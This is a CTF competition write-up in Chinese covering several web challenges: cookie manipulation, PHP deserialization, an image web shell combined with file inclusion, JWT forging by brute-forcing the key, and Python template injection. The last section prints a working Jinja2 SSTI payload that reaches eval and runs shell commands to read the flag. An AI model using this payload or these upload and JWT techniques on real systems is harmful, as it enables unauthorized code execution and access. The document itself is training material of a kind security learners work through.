##练武题

1、阿森的爱情-1

1.png

2.png

提交数据抓包

3.png

返回包有个set-cookie,添加到cookie里

出来字符串

4.png

貌似不是flag…

后来听说直接御剑扫文件..不过环境被删了没继续试。

2、Php is the best language

5.png

6.png

下载,一个txt文件,打开是php源码

7.png

反序列化,构造语句获取payload

8.png

9.png

10.png

Base64解码,得到flag

11.png

3、What can images do

12.png

13.png

看题目的意思大概是上传绕过或是图片马结合文件包含

先尝试绕过,发现是白名单限制+内容检测

上传图片马

14.png

在下面发现一个可以文件包含的点

15.png

把file1.php改成图片马

16.png

图片马被解析,蚁剑找到flag

17.png

18.png

Web4:未知的风险-1

19.png

抓包有个token

20.png

应该是jwt

21.png

题目说只允许user进入,那就是改user吧,爆破key之后encode提交

参考了文章

擂台题

Web1:Easy Injection

22.png

23.png

Python模板注入

24.png

说明{{}}里的语句被执行,利用其读取flag

Payload

{% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
      {% for b in c.__init__.__globals__.values() %}   
      {% if b.__class__ == {}.__class__ %}         //遍历基类 找到eval函数
        {% if 'eval' in b.keys() %}    //找到了
          {{ b['eval']('__import__("os").popen("ls").read()') }}  //导入cmd 执行popen里的命令 read读出数据
        {% endif %}
      {% endif %}
      {% endfor %}
{% endif %}
{% endfor %}

发现一个flog文件

25.png

将ls改为 cat flog读取flag

26.png